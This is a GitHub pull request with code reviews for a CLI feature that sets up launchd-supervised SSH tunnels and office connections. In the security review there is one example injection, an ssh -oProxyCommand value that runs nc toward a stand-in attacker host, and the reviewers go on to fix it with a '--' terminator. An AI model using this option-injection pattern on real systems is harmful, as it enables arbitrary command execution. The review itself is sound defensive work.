ops-7x9y: tps office join --tunnel-via auto-provisioning#285
Conversation
Adds launchd supervision (SSH tunnel + persistent office connect) to tps office join: - --tunnel-via <ssh-host>: auto-provision two launchd plists after join handshake (ai.tpsdev.tunnel-<name> for the SSH tunnel, ai.tpsdev.office-<name> for persistent office connect) - --port <n>: override auto-pick from 33700-33999 range - --force: regenerate supervision when it already exists - --keep-units: skip supervision teardown on revoke tps office status <name> now reports supervision state via launchctl. tps office revoke <name> tears down supervision units (plist delete, launchctl unload, manifest removal) by default. New module: src/commands/office-supervision.ts - plist generation (atomic tmp+rename write, mirroring flair pattern) - port scanning across existing LaunchAgents - launchctl load/unload wrappers - supervision manifest read/write (0644, no secrets) - SSH reachability validation before install 15 tests in test/office-supervision.test.ts covering manifest I/O, plist rendering, port scanning, and teardown.
…matchAll Two CI fixes: - bin/tps.ts:130 had a duplicate `force` flag declaration (line 106 already declared it globally). TS1117. Removed the duplicate — supervision case reuses the global flag. - office-supervision.ts:48 used `while ((m = re.exec(content)) !== null)` which biome flags as noAssignInExpressions. Rewrote as `for (const m of content.matchAll(re))`. Same code, no behavior change. 15 tests still pass. Also rebased onto current main to drop the stale openclaw-tps-mail commit that #280 already shipped.
7d62710 to
de90bbd
Compare
tps-kern
left a comment
There was a problem hiding this comment.
Architecture review — PR #285
Spec verification (5 checks)
1. Supervision manifest schema for ops-209a ✅ — SupervisionManifest is cleanly structured with tunnel + office + installedAt. Extensible: downstream readers cherry-pick what they need. No version field, but it's brand new — adding one now before anything ships would be cheap insurance. Not blocking.
2. Idempotency check ✅ — join --tunnel-via calls supervisionExists(agent); aborts without --force; tears down + reinstalls with --force. Wired correctly in office.ts.
3. Atomic plist write ✅ — writePlist uses .tmp + renameSync matching cli#281. Test asserts no stale .tmp. One difference from flair-config: flair-config uses ${p}.${process.pid}.tmp (PID-suffixed) for concurrent-write safety; writePlist uses bare .tmp. Low risk since tps office join is single-invocation, but the PID suffix pattern is strictly better for defense-in-depth. NIT.
4. Revoke teardown ✅ — teardownSupervision unloads both units, deletes both plist files, and deletes the manifest. --keep-units skips this. Ordering concern (see finding #1 below) but non-blocking.
5. Port scan range + collision detection ✅ — Range is 33700–33999 (300 ports). Regex scans launchd plists for -L <port>: patterns. Test verifies occupied-port skip, adjacent skip, and full-range exhaustion. Reasonable.
Findings
1. 🟡 Supervision teardown before revokeBranch (ordering)
In revoke, supervision is torn down before revokeBranch(agent, "manual revocation"). If revokeBranch fails (e.g., the branch directory is locked), supervision units are already gone and unrecoverable. The safer order is: revoke the branch first, then tear down supervision. The catch block makes this survivable (it's a warning, not a hard failure), but the ordering leaves a window where a failed revoke leaves the user with neither branch record nor supervision.
Fix: Move supervision teardown to after revokeBranch. If --keep-units, it's moot. If not, revokeBranch succeeds first, then supervision is torn down.
2. 🟡 isUnitLoaded always returns true (logic bug)
function isUnitLoaded(label: string): boolean {
try {
execSync(`launchctl list "${label}" 2>/dev/null || true`, { encoding: "utf-8" }).trim();
return true; // ← ALWAYS true because || true prevents execSync from throwing
} catch {
return false;
}
}The || true ensures execSync exit code is always 0, so the function unconditionally returns true regardless of whether the unit is loaded. The stdout is trimmed but never inspected.
Impact: Cosmetic. The only caller is unloadUnit, which has its own 2>/dev/null || true guard around the launchctl unload command. So unloadUnit always attempts to unload (even for non-existent units), which is harmless.
Fix: Check stdout — launchctl list <label> returns a tab-separated line like PID\tSTATUS\tLABEL when loaded, empty when not found (with || true):
const out = execSync(`launchctl list "${label}" 2>/dev/null || true`, { encoding: "utf-8" }).trim();
return out.length > 0 && out !== "-";3. 🔵 generateOfficePlist hardcodes ~/ops/tps repo path
const tpsJs = join(home, "ops/tps/packages/cli/dist/bin/tps.js");This assumes the TPS repo is cloned at ~/ops/tps and that dist/bin/tps.js exists (i.e., the project has been built). If a user clones to a different path or hasn't built, the plist points to a nonexistent binary and the supervised office process will fail to launch. This is a deployment assumption — document it, or consider resolving the path from the running process (process.argv[1] or import.meta.url).
4. 🔵 readSupervision can throw on malformed JSON
const raw = JSON.parse(readFileSync(p, "utf-8"));No try/catch. Callers in office.ts wrap their calls in try/catch, so unhandled in practice, but a malformed file makes readSupervision opaque to callers who don't expect exceptions from a read function. Wrap JSON.parse or add a try/catch returning null.
Other observations
- Test quality: 15 tests covering manifest I/O, plist rendering, port scanning, atomic write/delete, and teardown. Thorough.
- Plist content: Both
KeepAlivekeys use<true/>(simple keepalive), notCrasheddict. Correct for crash-on-exit behavior. - Plist permissions: 0644 for plists (standard for LaunchAgents). Manifest 0644 — note
tunnelViais a host alias; no secrets stored. Reasonable. unloadUnitbest-effort design: Uses2>/dev/null || true— won't crash on missing units. Correct pattern for teardown.tps office statusintegration: Thecase "status"block dynamically importsoffice-supervision.jsand reports unit state. Nice touch — status knows about supervision without coupling the module at load time. The--jsonpath is noted as "not yet merged" — acceptable for initial ship.
APPROVE_WITH_NITS
tps-sherlock
left a comment
There was a problem hiding this comment.
Security review — PR #285
Findings (security/threat surface)
1. 🟡 SSH option injection in validateSshReachable — defense-in-depth gap
const result = spawnSync("ssh", [host, "exit", "0"], {
stdio: "pipe",
encoding: "utf-8",
timeout: 15_000,
});host comes directly from user-controlled --tunnel-via. spawnSync with array args correctly prevents shell injection, but does not prevent SSH option injection. If host starts with -, OpenSSH interprets it as an option:
ssh -oProxyCommand='nc attacker.com 22' exit 0
Here -oProxyCommand=... is processed as an option, exit becomes the hostname, 0 the command. The proxy command executes as part of the connection attempt. While the follow-on plist would fail (no host argument remains), the validation function itself is injectable.
Fix: Add -- before the host to end option processing:
spawnSync("ssh", ["--", host, "exit", "0"], { ... })Same hardening should apply to the generated tunnel plist:
<array>
<string>${ssh}</string>
<string>-N</string>
<string>-L</string>
<string>${params.localPort}:127.0.0.1:${params.localPort}</string>
<string>--</string>
<string>${params.tunnelVia}</string>
</array>2. Minor — tunnelVia interpolated raw into XML without escaping
<string>${params.tunnelVia}</string>If tunnelVia contains <, >, &, or ", the plist XML is malformed. Not a security issue (user attacks their own plist), but a robustness concern. Consider tunnelVia.replace(/[&<>"]/g, ...) or documenting that hostnames must not contain XML metacharacters.
3. ✅ Port scan reads own user dir only — VERIFIED
const launchAgentsDir = join(home, "Library", "LaunchAgents");Only the caller's home directory is scanned. Unreadable plists are caught and skipped:
try {
const content = readFileSync(join(launchAgentsDir, f), "utf-8");
...
} catch {
// unreadable plist → skip
}No panic on missing directory or unreadable file.
4. ✅ Supervision manifest mode 0644 — VERIFIED safe
writeFileSync(p, JSON.stringify(manifest, null, 2), { encoding: "utf-8", mode: 0o644 });Manifest contains only plist labels, filesystem paths, local port, tunnel hostname, and timestamp. No credentials, tokens, or private keys. The auth path lives in flair.json (mode 0600, separate PR #284). 0644 is correct for this data.
5. ✅ Atomic write pattern — VERIFIED
const tmp = dest + ".tmp";
writeFileSync(tmp, content, { encoding: "utf-8", mode: 0o644 });
renameSync(tmp, dest);Consistent with cli#281 and #284 patterns. .tmp file is cleaned up via rename.
6. ✅ Teardown safety — VERIFIED
Revocation proceeds even if supervision teardown fails:
try {
... teardownSupervision(agent) ...
} catch (e: any) {
console.error(`⚠️ Supervision teardown warning: ${e.message}`);
// Don't fail — revocation should still proceed
}--keep-units flag provides an escape hatch. --force prevents accidental overwrite during re-join. Good UX/safety balance.
Verdict
APPROVE_WITH_NITS
Core architecture is sound: atomic writes, scoped file permissions, graceful error handling, no secrets in world-readable files. The SSH option injection is the only material finding — the exploit path is constrained (user controls their own --tunnel-via, and a successful injection in validation would leave the plist without a host argument), but defense-in-depth with -- is cheap, standard, and correct. Recommend applying before merge.
Finding 1 (architecture): Move supervision teardown AFTER revokeBranch succeeds, so supervision is not orphaned if revokeBranch throws. Finding 2 (architecture): Fix isUnitLoaded — it now checks stdout content (non-empty and not "-") instead of always returning true. Finding 3 (architecture): Make TPS CLI path configurable via TPS_CLI_PATH env var, falling back to ~/ops/tps/packages/cli/dist/bin/tps.js. Finding 4 (architecture): Guard JSON.parse in readSupervision with try/catch; throw descriptive error for corrupt manifest files. Finding 5 (security): Add -- terminator before hostname in both validateSshReachable and generateTunnelPlist to prevent SSH option injection when host starts with -. XML-escape hostname in plist templates for robustness with metacharacters. Optional NIT: Atomic write tmp suffix now includes process.pid (defense-in-depth for concurrent plist writes). Tests: +7 regression tests covering findings 2, 3, 4, 5 (corrupt manifest, TPS_CLI_PATH override, XML escaping, dash-hostname in plist, -- in error messages, port scanning with -- terminator).
tps-kern
left a comment
There was a problem hiding this comment.
Architecture re-review — all r1 findings addressed. APPROVED.
Kern r1 nits verified:
- 🟡 #1: teardown moved AFTER revokeBranch ✅
- 🟡 #2: isUnitLoaded inspects stdout (out.length > 0 && out !== '-') ✅
- 🔵 #3: TPS_CLI_PATH env var with sensible fallback; resolveTpsJs() isolated ✅
- 4th: JSON.parse guarded with descriptive throw ✅
Sherlock r1 nits verified:
- 🟡 #5: -- before hostname in both validateSshReachable and tunnel plist ✅
- xmlEscape() on tunnelVia, ssh, bun, tpsJs — prevents XML injection in plists ✅
- Plist regex ignores port-like tokens after -- ✅
Bonus fix: writePlist now uses PID-suffixed .tmp (matching flair-config pattern from r1 comment).
tps-sherlock
left a comment
There was a problem hiding this comment.
Security re-review — PR #285 (r2)
All r1 findings addressed:
1. SSH option injection — FIXED ✅
// validateSshReachable
spawnSync("ssh", ["--", host, "exit", "0"], { ... })
// Tunnel plist
<string>--</string>
<string>${xmlEscape(params.tunnelVia)}</string>-- terminates option processing before hostname in both validation and persistent tunnel plist. Test asserts command format in error message.
2. XML escaping — FIXED ✅
function xmlEscape(s: string): string {
return s
.replace(/&/g, "&")
.replace(/</g, "<")
.replace(/>/g, ">")
.replace(/"/g, """);
}Applied to ssh, bun, tpsJs, and tunnelVia in plist generation. Test covers metacharacter hostname evil-host&<>".
3. Additional hardening verified:
isUnitLoadednow inspects stdout content (out.length > 0 && out !== "-") ✅readSupervisionguardsJSON.parsewith descriptive error on corrupt manifest ✅- Hardcoded path replaced with
resolveTpsJs()+TPS_CLI_PATHenv override ✅ - Teardown moved AFTER
revokeBranchto prevent orphaning on revoke failure ✅ - Atomic write uses
.${process.pid}.tmp(consistent with cli#284 pattern) ✅
No new security surfaces introduced.
APPROVED
Summary
Extends
tps office jointo auto-provision launchd supervision for SSH tunnels and persistent office connections via--tunnel-via <ssh-host>.What it does
When
--tunnel-via <ssh-host>is passed totps office join:--port <n>)ai.tpsdev.tunnel-<name>—ssh -N -L <port>:127.0.0.1:<port> <ssh-host>ai.tpsdev.office-<name>—bun run tps.js office connect <name>~/.tps/branch-office/<name>/supervision.jsonlaunchctl loads both units immediatelytps office revoketears down supervision automatically (skip with--keep-units)tps office status <name>reports launchd stateDesign decisions
--force. With--force, existing units are torn down and regenerated.ssh <host> exit 0before provisioningFiles changed
src/commands/office-supervision.tssrc/commands/office.tstunnelVia,port,force,keepUnitstoOfficeArgs. Supervision install incase "join", teardown incase "revoke", state reporting incase "status"bin/tps.ts--tunnel-via/--port/--force/--keep-unitsflags; passed torunOfficetest/office-supervision.test.tsTest results
Out of scope (separate PRs)